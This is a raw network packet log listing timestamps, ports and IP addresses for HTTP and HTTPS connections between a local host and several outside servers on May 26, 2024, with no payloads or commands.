May 26, 2024 10:30:27.705606937 CEST	80	49717	45.129.96.86	192.168.2.5
May 26, 2024 10:30:27.705632925 CEST	49717	80	192.168.2.5	45.129.96.86
May 26, 2024 10:30:27.706593990 CEST	80	49717	45.129.96.86	192.168.2.5
May 26, 2024 10:30:27.706625938 CEST	80	49717	45.129.96.86	192.168.2.5
May 26, 2024 10:30:27.706653118 CEST	49717	80	192.168.2.5	45.129.96.86
May 26, 2024 10:30:27.707885981 CEST	80	49717	45.129.96.86	192.168.2.5
May 26, 2024 10:30:27.707931995 CEST	80	49717	45.129.96.86	192.168.2.5
May 26, 2024 10:30:27.707961082 CEST	49717	80	192.168.2.5	45.129.96.86
May 26, 2024 10:30:27.708340883 CEST	80	49717	45.129.96.86	192.168.2.5
May 26, 2024 10:30:27.708373070 CEST	80	49717	45.129.96.86	192.168.2.5
May 26, 2024 10:30:27.708399057 CEST	49717	80	192.168.2.5	45.129.96.86
May 26, 2024 10:30:27.709194899 CEST	80	49717	45.129.96.86	192.168.2.5
May 26, 2024 10:30:27.709256887 CEST	49717	80	192.168.2.5	45.129.96.86
May 26, 2024 10:30:27.709760904 CEST	80	49717	45.129.96.86	192.168.2.5
May 26, 2024 10:30:27.709793091 CEST	80	49717	45.129.96.86	192.168.2.5
May 26, 2024 10:30:27.709846973 CEST	49717	80	192.168.2.5	45.129.96.86
May 26, 2024 10:30:27.710769892 CEST	80	49717	45.129.96.86	192.168.2.5
May 26, 2024 10:30:27.711297989 CEST	80	49717	45.129.96.86	192.168.2.5
May 26, 2024 10:30:27.711330891 CEST	80	49717	45.129.96.86	192.168.2.5
May 26, 2024 10:30:27.711357117 CEST	49717	80	192.168.2.5	45.129.96.86
May 26, 2024 10:30:27.711361885 CEST	80	49717	45.129.96.86	192.168.2.5
May 26, 2024 10:30:27.711416006 CEST	49717	80	192.168.2.5	45.129.96.86
May 26, 2024 10:30:27.712244034 CEST	80	49717	45.129.96.86	192.168.2.5
May 26, 2024 10:30:27.712276936 CEST	80	49717	45.129.96.86	192.168.2.5
May 26, 2024 10:30:27.712327957 CEST	49717	80	192.168.2.5	45.129.96.86
May 26, 2024 10:30:27.713253021 CEST	80	49717	45.129.96.86	192.168.2.5
May 26, 2024 10:30:27.713285923 CEST	80	49717	45.129.96.86	192.168.2.5
May 26, 2024 10:30:27.713346004 CEST	49717	80	192.168.2.5	45.129.96.86
May 26, 2024 10:30:27.730983019 CEST	80	49717	45.129.96.86	192.168.2.5
May 26, 2024 10:30:27.731164932 CEST	80	49717	45.129.96.86	192.168.2.5
May 26, 2024 10:30:27.731345892 CEST	49717	80	192.168.2.5	45.129.96.86
May 26, 2024 10:30:27.731657982 CEST	80	49717	45.129.96.86	192.168.2.5
May 26, 2024 10:30:27.731690884 CEST	80	49717	45.129.96.86	192.168.2.5
May 26, 2024 10:30:27.731745958 CEST	49717	80	192.168.2.5	45.129.96.86
May 26, 2024 10:30:27.732604027 CEST	80	49717	45.129.96.86	192.168.2.5
May 26, 2024 10:30:27.735754967 CEST	80	49717	45.129.96.86	192.168.2.5
May 26, 2024 10:30:27.735836029 CEST	49717	80	192.168.2.5	45.129.96.86
May 26, 2024 10:30:27.753495932 CEST	80	49717	45.129.96.86	192.168.2.5
May 26, 2024 10:30:27.753694057 CEST	80	49717	45.129.96.86	192.168.2.5
May 26, 2024 10:30:27.753779888 CEST	49717	80	192.168.2.5	45.129.96.86
May 26, 2024 10:30:27.754156113 CEST	80	49717	45.129.96.86	192.168.2.5
May 26, 2024 10:30:27.754612923 CEST	80	49717	45.129.96.86	192.168.2.5
May 26, 2024 10:30:27.754646063 CEST	80	49717	45.129.96.86	192.168.2.5
May 26, 2024 10:30:27.754677057 CEST	80	49717	45.129.96.86	192.168.2.5
May 26, 2024 10:30:27.754678965 CEST	49717	80	192.168.2.5	45.129.96.86
May 26, 2024 10:30:27.754734039 CEST	49717	80	192.168.2.5	45.129.96.86
May 26, 2024 10:30:27.755498886 CEST	80	49717	45.129.96.86	192.168.2.5
May 26, 2024 10:30:27.755983114 CEST	80	49717	45.129.96.86	192.168.2.5
May 26, 2024 10:30:27.756015062 CEST	80	49717	45.129.96.86	192.168.2.5
May 26, 2024 10:30:27.756045103 CEST	49717	80	192.168.2.5	45.129.96.86
May 26, 2024 10:30:27.756918907 CEST	80	49717	45.129.96.86	192.168.2.5
May 26, 2024 10:30:27.756954908 CEST	80	49717	45.129.96.86	192.168.2.5
May 26, 2024 10:30:27.756984949 CEST	49717	80	192.168.2.5	45.129.96.86
May 26, 2024 10:30:27.757786989 CEST	80	49717	45.129.96.86	192.168.2.5
May 26, 2024 10:30:27.757858038 CEST	49717	80	192.168.2.5	45.129.96.86
May 26, 2024 10:30:27.758260012 CEST	80	49717	45.129.96.86	192.168.2.5
May 26, 2024 10:30:27.758296967 CEST	80	49717	45.129.96.86	192.168.2.5
May 26, 2024 10:30:27.758343935 CEST	49717	80	192.168.2.5	45.129.96.86
May 26, 2024 10:30:27.759233952 CEST	80	49717	45.129.96.86	192.168.2.5
May 26, 2024 10:30:27.759272099 CEST	80	49717	45.129.96.86	192.168.2.5
May 26, 2024 10:30:27.759325027 CEST	49717	80	192.168.2.5	45.129.96.86
May 26, 2024 10:30:27.774195910 CEST	80	49717	45.129.96.86	192.168.2.5
May 26, 2024 10:30:27.774276972 CEST	80	49717	45.129.96.86	192.168.2.5
May 26, 2024 10:30:27.774358988 CEST	49717	80	192.168.2.5	45.129.96.86
May 26, 2024 10:30:27.774893999 CEST	80	49717	45.129.96.86	192.168.2.5
May 26, 2024 10:30:27.774909019 CEST	80	49717	45.129.96.86	192.168.2.5
May 26, 2024 10:30:27.774957895 CEST	49717	80	192.168.2.5	45.129.96.86
May 26, 2024 10:30:27.775613070 CEST	80	49717	45.129.96.86	192.168.2.5
May 26, 2024 10:30:27.775628090 CEST	80	49717	45.129.96.86	192.168.2.5
May 26, 2024 10:30:27.775672913 CEST	49717	80	192.168.2.5	45.129.96.86
May 26, 2024 10:30:27.776525974 CEST	80	49717	45.129.96.86	192.168.2.5
May 26, 2024 10:30:27.776540995 CEST	80	49717	45.129.96.86	192.168.2.5
May 26, 2024 10:30:27.776555061 CEST	80	49717	45.129.96.86	192.168.2.5
May 26, 2024 10:30:27.776582956 CEST	49717	80	192.168.2.5	45.129.96.86
May 26, 2024 10:30:27.777424097 CEST	80	49717	45.129.96.86	192.168.2.5
May 26, 2024 10:30:27.777462006 CEST	80	49717	45.129.96.86	192.168.2.5
May 26, 2024 10:30:27.777491093 CEST	49717	80	192.168.2.5	45.129.96.86
May 26, 2024 10:30:27.778316021 CEST	80	49717	45.129.96.86	192.168.2.5
May 26, 2024 10:30:27.778331995 CEST	80	49717	45.129.96.86	192.168.2.5
May 26, 2024 10:30:27.778362989 CEST	49717	80	192.168.2.5	45.129.96.86
May 26, 2024 10:30:27.779223919 CEST	80	49717	45.129.96.86	192.168.2.5
May 26, 2024 10:30:27.779238939 CEST	80	49717	45.129.96.86	192.168.2.5
May 26, 2024 10:30:27.779272079 CEST	49717	80	192.168.2.5	45.129.96.86
May 26, 2024 10:30:27.780194998 CEST	80	49717	45.129.96.86	192.168.2.5
May 26, 2024 10:30:27.780210972 CEST	80	49717	45.129.96.86	192.168.2.5
May 26, 2024 10:30:27.780237913 CEST	49717	80	192.168.2.5	45.129.96.86
May 26, 2024 10:30:27.781022072 CEST	80	49717	45.129.96.86	192.168.2.5
May 26, 2024 10:30:27.781037092 CEST	80	49717	45.129.96.86	192.168.2.5
May 26, 2024 10:30:27.781049967 CEST	80	49717	45.129.96.86	192.168.2.5
May 26, 2024 10:30:27.781064034 CEST	49717	80	192.168.2.5	45.129.96.86
May 26, 2024 10:30:27.781085014 CEST	49717	80	192.168.2.5	45.129.96.86
May 26, 2024 10:30:27.781851053 CEST	80	49717	45.129.96.86	192.168.2.5
May 26, 2024 10:30:27.781864882 CEST	80	49717	45.129.96.86	192.168.2.5
May 26, 2024 10:30:27.781913996 CEST	49717	80	192.168.2.5	45.129.96.86
May 26, 2024 10:30:27.782514095 CEST	80	49717	45.129.96.86	192.168.2.5
May 26, 2024 10:30:27.782529116 CEST	80	49717	45.129.96.86	192.168.2.5
May 26, 2024 10:30:27.782576084 CEST	49717	80	192.168.2.5	45.129.96.86
May 26, 2024 10:30:27.783199072 CEST	80	49717	45.129.96.86	192.168.2.5
May 26, 2024 10:30:27.783215046 CEST	80	49717	45.129.96.86	192.168.2.5
May 26, 2024 10:30:27.783253908 CEST	49717	80	192.168.2.5	45.129.96.86
May 26, 2024 10:30:27.783915997 CEST	80	49717	45.129.96.86	192.168.2.5
May 26, 2024 10:30:27.783930063 CEST	80	49717	45.129.96.86	192.168.2.5
May 26, 2024 10:30:27.783943892 CEST	80	49717	45.129.96.86	192.168.2.5
May 26, 2024 10:30:27.783966064 CEST	49717	80	192.168.2.5	45.129.96.86
May 26, 2024 10:30:27.784625053 CEST	80	49717	45.129.96.86	192.168.2.5
May 26, 2024 10:30:27.784638882 CEST	80	49717	45.129.96.86	192.168.2.5
May 26, 2024 10:30:27.784668922 CEST	49717	80	192.168.2.5	45.129.96.86
May 26, 2024 10:30:27.785387039 CEST	80	49717	45.129.96.86	192.168.2.5
May 26, 2024 10:30:27.785403013 CEST	80	49717	45.129.96.86	192.168.2.5
May 26, 2024 10:30:27.785434008 CEST	49717	80	192.168.2.5	45.129.96.86
May 26, 2024 10:30:27.786067963 CEST	80	49717	45.129.96.86	192.168.2.5
May 26, 2024 10:30:27.786082983 CEST	80	49717	45.129.96.86	192.168.2.5
May 26, 2024 10:30:27.786115885 CEST	49717	80	192.168.2.5	45.129.96.86
May 26, 2024 10:30:27.786812067 CEST	80	49717	45.129.96.86	192.168.2.5
May 26, 2024 10:30:27.786827087 CEST	80	49717	45.129.96.86	192.168.2.5
May 26, 2024 10:30:27.786864996 CEST	49717	80	192.168.2.5	45.129.96.86
May 26, 2024 10:30:27.787619114 CEST	80	49717	45.129.96.86	192.168.2.5
May 26, 2024 10:30:27.787652969 CEST	80	49717	45.129.96.86	192.168.2.5
May 26, 2024 10:30:27.787667036 CEST	80	49717	45.129.96.86	192.168.2.5
May 26, 2024 10:30:27.787691116 CEST	49717	80	192.168.2.5	45.129.96.86
May 26, 2024 10:30:27.787718058 CEST	49717	80	192.168.2.5	45.129.96.86
May 26, 2024 10:30:27.788425922 CEST	80	49717	45.129.96.86	192.168.2.5
May 26, 2024 10:30:27.788440943 CEST	80	49717	45.129.96.86	192.168.2.5
May 26, 2024 10:30:27.788487911 CEST	49717	80	192.168.2.5	45.129.96.86
May 26, 2024 10:30:27.789062023 CEST	80	49717	45.129.96.86	192.168.2.5
May 26, 2024 10:30:27.789077044 CEST	80	49717	45.129.96.86	192.168.2.5
May 26, 2024 10:30:27.789115906 CEST	49717	80	192.168.2.5	45.129.96.86
May 26, 2024 10:30:27.789694071 CEST	80	49717	45.129.96.86	192.168.2.5
May 26, 2024 10:30:27.789707899 CEST	80	49717	45.129.96.86	192.168.2.5
May 26, 2024 10:30:27.789747953 CEST	49717	80	192.168.2.5	45.129.96.86
May 26, 2024 10:30:27.790347099 CEST	80	49717	45.129.96.86	192.168.2.5
May 26, 2024 10:30:27.790361881 CEST	80	49717	45.129.96.86	192.168.2.5
May 26, 2024 10:30:27.790374994 CEST	80	49717	45.129.96.86	192.168.2.5
May 26, 2024 10:30:27.790395975 CEST	49717	80	192.168.2.5	45.129.96.86
May 26, 2024 10:30:27.791030884 CEST	80	49717	45.129.96.86	192.168.2.5
May 26, 2024 10:30:27.791045904 CEST	80	49717	45.129.96.86	192.168.2.5
May 26, 2024 10:30:27.791059971 CEST	80	49717	45.129.96.86	192.168.2.5
May 26, 2024 10:30:27.791079998 CEST	49717	80	192.168.2.5	45.129.96.86
May 26, 2024 10:30:27.791102886 CEST	49717	80	192.168.2.5	45.129.96.86
May 26, 2024 10:30:27.792078018 CEST	80	49717	45.129.96.86	192.168.2.5
May 26, 2024 10:30:27.792093992 CEST	80	49717	45.129.96.86	192.168.2.5
May 26, 2024 10:30:27.792109013 CEST	80	49717	45.129.96.86	192.168.2.5
May 26, 2024 10:30:27.792140007 CEST	49717	80	192.168.2.5	45.129.96.86
May 26, 2024 10:30:27.793047905 CEST	80	49717	45.129.96.86	192.168.2.5
May 26, 2024 10:30:27.793064117 CEST	80	49717	45.129.96.86	192.168.2.5
May 26, 2024 10:30:27.793077946 CEST	80	49717	45.129.96.86	192.168.2.5
May 26, 2024 10:30:27.793101072 CEST	49717	80	192.168.2.5	45.129.96.86
May 26, 2024 10:30:27.793128014 CEST	49717	80	192.168.2.5	45.129.96.86
May 26, 2024 10:30:27.793620110 CEST	80	49717	45.129.96.86	192.168.2.5
May 26, 2024 10:30:27.793633938 CEST	80	49717	45.129.96.86	192.168.2.5
May 26, 2024 10:30:27.793689013 CEST	49717	80	192.168.2.5	45.129.96.86
May 26, 2024 10:30:27.794203997 CEST	80	49717	45.129.96.86	192.168.2.5
May 26, 2024 10:30:27.794218063 CEST	80	49717	45.129.96.86	192.168.2.5
May 26, 2024 10:30:27.794230938 CEST	80	49717	45.129.96.86	192.168.2.5
May 26, 2024 10:30:27.794254065 CEST	49717	80	192.168.2.5	45.129.96.86
May 26, 2024 10:30:27.795111895 CEST	80	49717	45.129.96.86	192.168.2.5
May 26, 2024 10:30:27.795128107 CEST	80	49717	45.129.96.86	192.168.2.5
May 26, 2024 10:30:27.795156956 CEST	49717	80	192.168.2.5	45.129.96.86
May 26, 2024 10:30:27.795667887 CEST	80	49717	45.129.96.86	192.168.2.5
May 26, 2024 10:30:27.795711994 CEST	49717	80	192.168.2.5	45.129.96.86
May 26, 2024 10:30:27.796029091 CEST	80	49717	45.129.96.86	192.168.2.5
May 26, 2024 10:30:27.796042919 CEST	80	49717	45.129.96.86	192.168.2.5
May 26, 2024 10:30:27.796056032 CEST	80	49717	45.129.96.86	192.168.2.5
May 26, 2024 10:30:27.796071053 CEST	80	49717	45.129.96.86	192.168.2.5
May 26, 2024 10:30:27.796078920 CEST	49717	80	192.168.2.5	45.129.96.86
May 26, 2024 10:30:27.796101093 CEST	49717	80	192.168.2.5	45.129.96.86
May 26, 2024 10:30:27.796818972 CEST	80	49717	45.129.96.86	192.168.2.5
May 26, 2024 10:30:27.796838999 CEST	80	49717	45.129.96.86	192.168.2.5
May 26, 2024 10:30:27.796880960 CEST	49717	80	192.168.2.5	45.129.96.86
May 26, 2024 10:30:27.797429085 CEST	80	49717	45.129.96.86	192.168.2.5
May 26, 2024 10:30:27.797450066 CEST	80	49717	45.129.96.86	192.168.2.5
May 26, 2024 10:30:27.797465086 CEST	80	49717	45.129.96.86	192.168.2.5
May 26, 2024 10:30:27.797527075 CEST	49717	80	192.168.2.5	45.129.96.86
May 26, 2024 10:30:27.798290968 CEST	80	49717	45.129.96.86	192.168.2.5
May 26, 2024 10:30:27.798327923 CEST	80	49717	45.129.96.86	192.168.2.5
May 26, 2024 10:30:27.798341036 CEST	80	49717	45.129.96.86	192.168.2.5
May 26, 2024 10:30:27.798355103 CEST	80	49717	45.129.96.86	192.168.2.5
May 26, 2024 10:30:27.798358917 CEST	49717	80	192.168.2.5	45.129.96.86
May 26, 2024 10:30:27.798381090 CEST	49717	80	192.168.2.5	45.129.96.86
May 26, 2024 10:30:27.799112082 CEST	80	49717	45.129.96.86	192.168.2.5
May 26, 2024 10:30:27.799127102 CEST	80	49717	45.129.96.86	192.168.2.5
May 26, 2024 10:30:27.799160004 CEST	49717	80	192.168.2.5	45.129.96.86
May 26, 2024 10:30:27.799674034 CEST	80	49717	45.129.96.86	192.168.2.5
May 26, 2024 10:30:27.799716949 CEST	49717	80	192.168.2.5	45.129.96.86
May 26, 2024 10:30:27.835583925 CEST	80	49717	45.129.96.86	192.168.2.5
May 26, 2024 10:30:27.840451002 CEST	80	49717	45.129.96.86	192.168.2.5
May 26, 2024 10:30:27.840651035 CEST	49717	80	192.168.2.5	45.129.96.86
May 26, 2024 10:30:27.845674038 CEST	80	49717	45.129.96.86	192.168.2.5
May 26, 2024 10:30:27.845736027 CEST	49717	80	192.168.2.5	45.129.96.86
May 26, 2024 10:30:27.845976114 CEST	80	49717	45.129.96.86	192.168.2.5
May 26, 2024 10:30:27.846004009 CEST	80	49717	45.129.96.86	192.168.2.5
May 26, 2024 10:30:27.846057892 CEST	49717	80	192.168.2.5	45.129.96.86
May 26, 2024 10:30:27.850588083 CEST	80	49717	45.129.96.86	192.168.2.5
May 26, 2024 10:30:27.899854898 CEST	49717	80	192.168.2.5	45.129.96.86
May 26, 2024 10:30:27.900515079 CEST	49718	80	192.168.2.5	190.187.52.42
May 26, 2024 10:30:27.909730911 CEST	80	49718	190.187.52.42	192.168.2.5
May 26, 2024 10:30:27.909910917 CEST	49718	80	192.168.2.5	190.187.52.42
May 26, 2024 10:30:27.910020113 CEST	49718	80	192.168.2.5	190.187.52.42
May 26, 2024 10:30:27.910036087 CEST	49718	80	192.168.2.5	190.187.52.42
May 26, 2024 10:30:27.960742950 CEST	80	49718	190.187.52.42	192.168.2.5
May 26, 2024 10:30:28.008037090 CEST	80	49718	190.187.52.42	192.168.2.5
May 26, 2024 10:30:28.768918037 CEST	49719	443	192.168.2.5	188.114.96.3
May 26, 2024 10:30:28.768954992 CEST	443	49719	188.114.96.3	192.168.2.5
May 26, 2024 10:30:28.769042969 CEST	49719	443	192.168.2.5	188.114.96.3
May 26, 2024 10:30:28.770148039 CEST	49719	443	192.168.2.5	188.114.96.3
May 26, 2024 10:30:28.770168066 CEST	443	49719	188.114.96.3	192.168.2.5
May 26, 2024 10:30:29.111198902 CEST	80	49718	190.187.52.42	192.168.2.5
May 26, 2024 10:30:29.116466999 CEST	80	49718	190.187.52.42	192.168.2.5
May 26, 2024 10:30:29.116519928 CEST	49718	80	192.168.2.5	190.187.52.42
May 26, 2024 10:30:29.116583109 CEST	49718	80	192.168.2.5	190.187.52.42
May 26, 2024 10:30:29.137029886 CEST	49720	80	192.168.2.5	190.187.52.42
May 26, 2024 10:30:29.172504902 CEST	80	49718	190.187.52.42	192.168.2.5
May 26, 2024 10:30:29.219451904 CEST	80	49720	190.187.52.42	192.168.2.5
May 26, 2024 10:30:29.219522953 CEST	49720	80	192.168.2.5	190.187.52.42
May 26, 2024 10:30:29.219755888 CEST	49720	80	192.168.2.5	190.187.52.42
May 26, 2024 10:30:29.219770908 CEST	49720	80	192.168.2.5	190.187.52.42
May 26, 2024 10:30:29.251993895 CEST	443	49719	188.114.96.3	192.168.2.5
May 26, 2024 10:30:29.252130032 CEST	49719	443	192.168.2.5	188.114.96.3
May 26, 2024 10:30:29.255582094 CEST	80	49720	190.187.52.42	192.168.2.5
May 26, 2024 10:30:29.255611897 CEST	80	49720	190.187.52.42	192.168.2.5
May 26, 2024 10:30:29.255914927 CEST	49719	443	192.168.2.5	188.114.96.3
May 26, 2024 10:30:29.255929947 CEST	443	49719	188.114.96.3	192.168.2.5
May 26, 2024 10:30:29.256416082 CEST	443	49719	188.114.96.3	192.168.2.5
May 26, 2024 10:30:29.305946112 CEST	49719	443	192.168.2.5	188.114.96.3
May 26, 2024 10:30:29.306854963 CEST	49719	443	192.168.2.5	188.114.96.3
May 26, 2024 10:30:29.306899071 CEST	49719	443	192.168.2.5	188.114.96.3
May 26, 2024 10:30:29.307034969 CEST	443	49719	188.114.96.3	192.168.2.5
May 26, 2024 10:30:30.068929911 CEST	443	49719	188.114.96.3	192.168.2.5
May 26, 2024 10:30:30.069154978 CEST	443	49719	188.114.96.3	192.168.2.5
May 26, 2024 10:30:30.069235086 CEST	49719	443	192.168.2.5	188.114.96.3
May 26, 2024 10:30:30.071722031 CEST	49719	443	192.168.2.5	188.114.96.3
May 26, 2024 10:30:30.071744919 CEST	443	49719	188.114.96.3	192.168.2.5
May 26, 2024 10:30:30.071768999 CEST	49719	443	192.168.2.5	188.114.96.3
May 26, 2024 10:30:30.071774006 CEST	443	49719	188.114.96.3	192.168.2.5
May 26, 2024 10:30:30.077519894 CEST	49721	443	192.168.2.5	188.114.96.3
May 26, 2024 10:30:30.077550888 CEST	443	49721	188.114.96.3	192.168.2.5
May 26, 2024 10:30:30.077917099 CEST	49721	443	192.168.2.5	188.114.96.3
May 26, 2024 10:30:30.078310013 CEST	49721	443	192.168.2.5	188.114.96.3
May 26, 2024 10:30:30.078325033 CEST	443	49721	188.114.96.3	192.168.2.5
May 26, 2024 10:30:30.382286072 CEST	80	49720	190.187.52.42	192.168.2.5
May 26, 2024 10:30:30.387002945 CEST	80	49720	190.187.52.42	192.168.2.5
May 26, 2024 10:30:30.388231993 CEST	49720	80	192.168.2.5	190.187.52.42
May 26, 2024 10:30:30.388287067 CEST	49720	80	192.168.2.5	190.187.52.42
May 26, 2024 10:30:30.440469980 CEST	80	49720	190.187.52.42	192.168.2.5
May 26, 2024 10:30:30.452934980 CEST	49722	80	192.168.2.5	190.187.52.42
May 26, 2024 10:30:30.458034992 CEST	80	49722	190.187.52.42	192.168.2.5
May 26, 2024 10:30:30.459209919 CEST	49722	80	192.168.2.5	190.187.52.42
May 26, 2024 10:30:30.459445000 CEST	49722	80	192.168.2.5	190.187.52.42
May 26, 2024 10:30:30.459465027 CEST	49722	80	192.168.2.5	190.187.52.42
May 26, 2024 10:30:30.512701988 CEST	80	49722	190.187.52.42	192.168.2.5
May 26, 2024 10:30:30.563646078 CEST	80	49722	190.187.52.42	192.168.2.5
May 26, 2024 10:30:30.602621078 CEST	443	49721	188.114.96.3	192.168.2.5
May 26, 2024 10:30:30.602848053 CEST	49721	443	192.168.2.5	188.114.96.3
May 26, 2024 10:30:30.694063902 CEST	49721	443	192.168.2.5	188.114.96.3
May 26, 2024 10:30:30.694087029 CEST	443	49721	188.114.96.3	192.168.2.5
May 26, 2024 10:30:30.694540024 CEST	443	49721	188.114.96.3	192.168.2.5
May 26, 2024 10:30:30.697505951 CEST	49721	443	192.168.2.5	188.114.96.3
May 26, 2024 10:30:30.697537899 CEST	49721	443	192.168.2.5	188.114.96.3
May 26, 2024 10:30:30.697603941 CEST	443	49721	188.114.96.3	192.168.2.5
May 26, 2024 10:30:31.603837013 CEST	80	49722	190.187.52.42	192.168.2.5
May 26, 2024 10:30:31.608551979 CEST	80	49722	190.187.52.42	192.168.2.5
May 26, 2024 10:30:31.608608007 CEST	49722	80	192.168.2.5	190.187.52.42
May 26, 2024 10:30:31.608678102 CEST	49722	80	192.168.2.5	190.187.52.42
May 26, 2024 10:30:31.621542931 CEST	49723	80	192.168.2.5	190.187.52.42
May 26, 2024 10:30:31.667980909 CEST	80	49722	190.187.52.42	192.168.2.5
May 26, 2024 10:30:31.719475985 CEST	80	49723	190.187.52.42	192.168.2.5
May 26, 2024 10:30:31.719566107 CEST	49723	80	192.168.2.5	190.187.52.42
May 26, 2024 10:30:31.722779036 CEST	49723	80	192.168.2.5	190.187.52.42
May 26, 2024 10:30:31.722824097 CEST	49723	80	192.168.2.5	190.187.52.42
May 26, 2024 10:30:31.778729916 CEST	80	49723	190.187.52.42	192.168.2.5
May 26, 2024 10:30:31.822567940 CEST	80	49723	190.187.52.42	192.168.2.5
May 26, 2024 10:30:31.828762054 CEST	443	49721	188.114.96.3	192.168.2.5
May 26, 2024 10:30:31.828928947 CEST	443	49721	188.114.96.3	192.168.2.5
May 26, 2024 10:30:31.829026937 CEST	49721	443	192.168.2.5	188.114.96.3
May 26, 2024 10:30:31.829056025 CEST	443	49721	188.114.96.3	192.168.2.5
May 26, 2024 10:30:31.836671114 CEST	443	49721	188.114.96.3	192.168.2.5
May 26, 2024 10:30:31.836731911 CEST	49721	443	192.168.2.5	188.114.96.3
May 26, 2024 10:30:31.836740971 CEST	443	49721	188.114.96.3	192.168.2.5
May 26, 2024 10:30:31.844259024 CEST	443	49721	188.114.96.3	192.168.2.5
May 26, 2024 10:30:31.846308947 CEST	443	49721	188.114.96.3	192.168.2.5
May 26, 2024 10:30:31.846378088 CEST	49721	443	192.168.2.5	188.114.96.3
May 26, 2024 10:30:31.846385002 CEST	443	49721	188.114.96.3	192.168.2.5
May 26, 2024 10:30:31.846426010 CEST	49721	443	192.168.2.5	188.114.96.3
May 26, 2024 10:30:31.846431971 CEST	443	49721	188.114.96.3	192.168.2.5
May 26, 2024 10:30:31.854351997 CEST	443	49721	188.114.96.3	192.168.2.5
May 26, 2024 10:30:31.854451895 CEST	443	49721	188.114.96.3	192.168.2.5
May 26, 2024 10:30:31.854507923 CEST	49721	443	192.168.2.5	188.114.96.3
May 26, 2024 10:30:31.854516029 CEST	443	49721	188.114.96.3	192.168.2.5
May 26, 2024 10:30:31.854563951 CEST	49721	443	192.168.2.5	188.114.96.3
May 26, 2024 10:30:31.854613066 CEST	443	49721	188.114.96.3	192.168.2.5
May 26, 2024 10:30:31.854715109 CEST	49721	443	192.168.2.5	188.114.96.3
May 26, 2024 10:30:31.854734898 CEST	443	49721	188.114.96.3	192.168.2.5
May 26, 2024 10:30:31.854746103 CEST	49721	443	192.168.2.5	188.114.96.3
May 26, 2024 10:30:31.854783058 CEST	443	49721	188.114.96.3	192.168.2.5
May 26, 2024 10:30:32.098299026 CEST	49724	443	192.168.2.5	188.114.96.3
May 26, 2024 10:30:32.098381996 CEST	443	49724	188.114.96.3	192.168.2.5
May 26, 2024 10:30:32.098529100 CEST	49724	443	192.168.2.5	188.114.96.3
May 26, 2024 10:30:32.098818064 CEST	49724	443	192.168.2.5	188.114.96.3
May 26, 2024 10:30:32.098850965 CEST	443	49724	188.114.96.3	192.168.2.5
May 26, 2024 10:30:32.611016989 CEST	443	49724	188.114.96.3	192.168.2.5
May 26, 2024 10:30:32.611094952 CEST	49724	443	192.168.2.5	188.114.96.3
May 26, 2024 10:30:32.612145901 CEST	49724	443	192.168.2.5	188.114.96.3
May 26, 2024 10:30:32.612153053 CEST	443	49724	188.114.96.3	192.168.2.5
May 26, 2024 10:30:32.612473965 CEST	443	49724	188.114.96.3	192.168.2.5
May 26, 2024 10:30:32.614099026 CEST	49724	443	192.168.2.5	188.114.96.3
May 26, 2024 10:30:32.614239931 CEST	49724	443	192.168.2.5	188.114.96.3
May 26, 2024 10:30:32.614265919 CEST	443	49724	188.114.96.3	192.168.2.5
May 26, 2024 10:30:32.875505924 CEST	80	49723	190.187.52.42	192.168.2.5
May 26, 2024 10:30:32.880280972 CEST	80	49723	190.187.52.42	192.168.2.5
May 26, 2024 10:30:32.880345106 CEST	49723	80	192.168.2.5	190.187.52.42
May 26, 2024 10:30:32.880378962 CEST	49723	80	192.168.2.5	190.187.52.42
May 26, 2024 10:30:32.890266895 CEST	80	49723	190.187.52.42	192.168.2.5
May 26, 2024 10:30:32.903192997 CEST	49725	80	192.168.2.5	23.145.40.124
May 26, 2024 10:30:32.908451080 CEST	80	49725	23.145.40.124	192.168.2.5
May 26, 2024 10:30:32.908534050 CEST	49725	80	192.168.2.5	23.145.40.124
May 26, 2024 10:30:32.908678055 CEST	49725	80	192.168.2.5	23.145.40.124
May 26, 2024 10:30:32.962893963 CEST	80	49725	23.145.40.124	192.168.2.5
May 26, 2024 10:30:34.410981894 CEST	443	49724	188.114.96.3	192.168.2.5
May 26, 2024 10:30:34.411210060 CEST	49724	443	192.168.2.5	188.114.96.3
May 26, 2024 10:30:34.599184990 CEST	49726	443	192.168.2.5	188.114.96.3
May 26, 2024 10:30:34.599261999 CEST	443	49726	188.114.96.3	192.168.2.5
May 26, 2024 10:30:34.599344015 CEST	49726	443	192.168.2.5	188.114.96.3
May 26, 2024 10:30:34.599623919 CEST	49726	443	192.168.2.5	188.114.96.3
May 26, 2024 10:30:34.599647999 CEST	443	49726	188.114.96.3	192.168.2.5
May 26, 2024 10:30:35.098191023 CEST	443	49726	188.114.96.3	192.168.2.5
May 26, 2024 10:30:35.098433018 CEST	49726	443	192.168.2.5	188.114.96.3
May 26, 2024 10:30:35.099519968 CEST	49726	443	192.168.2.5	188.114.96.3
May 26, 2024 10:30:35.099526882 CEST	443	49726	188.114.96.3	192.168.2.5
May 26, 2024 10:30:35.099849939 CEST	443	49726	188.114.96.3	192.168.2.5
May 26, 2024 10:30:35.101429939 CEST	49726	443	192.168.2.5	188.114.96.3
May 26, 2024 10:30:35.101551056 CEST	49726	443	192.168.2.5	188.114.96.3
May 26, 2024 10:30:35.101574898 CEST	443	49726	188.114.96.3	192.168.2.5
May 26, 2024 10:30:35.101630926 CEST	49726	443	192.168.2.5	188.114.96.3
May 26, 2024 10:30:35.101636887 CEST	443	49726	188.114.96.3	192.168.2.5
May 26, 2024 10:30:35.618268013 CEST	443	49726	188.114.96.3	192.168.2.5
May 26, 2024 10:30:35.618546963 CEST	443	49726	188.114.96.3	192.168.2.5
May 26, 2024 10:30:35.618634939 CEST	49726	443	192.168.2.5	188.114.96.3
May 26, 2024 10:30:35.625233889 CEST	49726	443	192.168.2.5	188.114.96.3
May 26, 2024 10:30:35.625262022 CEST	443	49726	188.114.96.3	192.168.2.5
May 26, 2024 10:30:36.185759068 CEST	49727	443	192.168.2.5	188.114.96.3
May 26, 2024 10:30:36.185843945 CEST	443	49727	188.114.96.3	192.168.2.5
May 26, 2024 10:30:36.185926914 CEST	49727	443	192.168.2.5	188.114.96.3
May 26, 2024 10:30:36.186292887 CEST	49727	443	192.168.2.5	188.114.96.3
May 26, 2024 10:30:36.186320066 CEST	443	49727	188.114.96.3	192.168.2.5
May 26, 2024 10:30:36.678169012 CEST	443	49727	188.114.96.3	192.168.2.5
May 26, 2024 10:30:36.678395987 CEST	49727	443	192.168.2.5	188.114.96.3
May 26, 2024 10:30:36.679490089 CEST	49727	443	192.168.2.5	188.114.96.3
May 26, 2024 10:30:36.679497004 CEST	443	49727	188.114.96.3	192.168.2.5
